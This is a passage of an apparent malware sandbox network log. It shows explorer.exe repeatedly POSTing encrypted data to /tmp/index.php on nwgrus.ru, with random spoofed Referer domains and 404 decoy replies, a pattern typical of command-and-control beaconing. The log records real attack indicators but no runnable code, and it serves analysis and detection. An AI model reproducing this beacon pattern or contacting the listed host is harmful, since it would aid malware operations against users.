61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49745	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:46.120929956 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://irqjlvxvguaa.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 141 Host: nwgrus.ru
Oct 14, 2024 10:02:46.120958090 CEST	141	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 45 43 ca 8c Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuECW#XkM(WL_G4lU@^"JH"
Oct 14, 2024 10:02:47.032917976 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:46 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49746	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:47.046334982 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://otrldmaxlwsqg.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 185 Host: nwgrus.ru
Oct 14, 2024 10:02:47.046350002 CEST	185	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 7a 39 f8 f9 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuz9?ZFNk4cp+$,T~_%IacZ,2OKT0y)\Zc!v
Oct 14, 2024 10:02:47.852401018 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:47.861527920 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://axdumywgicw.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 131 Host: nwgrus.ru
Oct 14, 2024 10:02:47.861558914 CEST	131	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 32 5d ec 9b Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu2]tTO=1yE1{0K3*Gw
Oct 14, 2024 10:02:48.657077074 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:48.666071892 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://drcsfcxotsike.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 215 Host: nwgrus.ru
Oct 14, 2024 10:02:48.666121006 CEST	215	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 21 24 cd fb Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu!$4X[5nUrar3["\|~%u3.'fE9/naU-osI;5/ckQ0DJ0
Oct 14, 2024 10:02:49.459602118 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:49.471048117 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ljowgttltjb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: nwgrus.ru
Oct 14, 2024 10:02:49.471084118 CEST	267	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 57 25 ff b9 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuW%qeh@=4U>}SE6`(tCF]AFEYI!-o17a8*`3c;b]q$IWNDn&U/K
Oct 14, 2024 10:02:50.282727003 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:50.291349888 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qqrvxoxcuflyv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 329 Host: nwgrus.ru
Oct 14, 2024 10:02:50.291383028 CEST	329	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 77 57 a8 e9 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuwWj?YXbdL'P1!4kW{e8#`O5lT<)cqk5#f7;38'/vhZM8_59
Oct 14, 2024 10:02:51.089848995 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:50 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:51.098297119 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bwkcgbjusdxgntcy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 236 Host: nwgrus.ru
Oct 14, 2024 10:02:51.098311901 CEST	236	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 79 53 c3 92 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuySrOdBxiUa>spb/C&pnlXH^I-I<DP}YY-sO%UIS6IT'4Pb\|\|Py0dve
Oct 14, 2024 10:02:51.895728111 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:51.912986994 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oivflmljlhkww.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 234 Host: nwgrus.ru
Oct 14, 2024 10:02:51.913023949 CEST	234	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 78 2a cb 9f Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vux*^GJ'qY9+FjK_m3&K609sH!2C0/^\|YWNypyJx9G>eH@bck0
Oct 14, 2024 10:02:52.777829885 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:52 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:52.786597967 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ametqvtlvslgmj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 193 Host: nwgrus.ru
Oct 14, 2024 10:02:52.786632061 CEST	193	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 5b 3d a3 e5 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu[=<^sd3S $2XA.NLOaJ;zg2 )H}UzE1+
Oct 14, 2024 10:02:53.594877958 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:53 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:53.602880955 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iwhghyqwahgf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 278 Host: nwgrus.ru
Oct 14, 2024 10:02:53.602914095 CEST	278	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 34 25 c2 87 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu4%b:fLK;-P%d;_e{6KK/E[[B]m4:)tE%+!-k]+Z4=dt@:z*`3=
Oct 14, 2024 10:02:54.432265043 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:54 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:54.440512896 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bvmbuxbytsytdm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 119 Host: nwgrus.ru
Oct 14, 2024 10:02:54.440557003 CEST	119	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 44 31 c2 9b Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuD1=r~#K~z%XJ+
Oct 14, 2024 10:02:55.356287003 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:55 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
